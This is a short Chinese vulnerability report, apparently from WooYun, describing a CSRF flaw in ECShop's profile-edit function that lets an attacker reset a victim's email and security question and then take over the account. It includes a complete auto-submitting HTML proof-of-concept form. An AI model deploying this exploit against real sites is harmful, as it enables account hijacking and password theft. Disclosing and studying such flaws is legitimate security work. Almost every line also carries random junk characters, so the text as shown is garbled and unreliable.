简要描述:
$ J- w: P( r `2 Q; Aecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现5 m. j: E- d7 |) M9 K
$ | i: ^) m/ {1 F
Demo For:http://www.wooyun.org/bug.php?action=view&id=395& s* [9 W% d- E- F! f& L
% \# S) c0 F ]& m. R# P: ]详细说明:6 a% v+ S+ e8 Z8 q
利用csrf和xss可以突破官方所说的“障碍”6 V6 a' `' u$ S1 ~- v; ?; h8 R6 Z
xss版本已经有人说明 N* ]: b' U5 N- |% j( t w
这里给出csrf版本, h1 E! y; n* m2 Z
) |# \' q: F3 n9 e5 x1 e漏洞证明:
, N" w$ z; d5 m$ _<html># L8 g7 A0 }' u5 _4 h4 J
<body>
! S9 g9 A) @# N; s1 Q<form action="http://www.wooyun.org/ecshop/user.php" method="POST">) I3 O/ u% X, L* b7 `. x5 s
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">7 g8 W/ ]( l* p; u2 h' y
<INPUT TYPE="text" NAME="act" value="act_edit_profile">. ^& r% e9 S8 F$ V p: d
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
) T0 }6 |& R: G" T+ o: z<INPUT TYPE="text" NAME="passwd_answer" value="exploit">9 b% [! f7 Q' t5 e) ~6 v7 \
</body>% A+ |& ]* W( v* n
<script>
8 Y, v9 p# l& j6 Y! Ndocument.forms[0].submit();! i' H% |9 v1 ^8 e! b' a
</script>
% ^. X' W' M9 B; ?</html>) o4 y+ Z- J5 t" I# H4 H7 Q
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
" x: u4 k0 N' `: {# W( _+ s: P7 }# D
7 s: n( O/ x7 Q6 H. x/ K |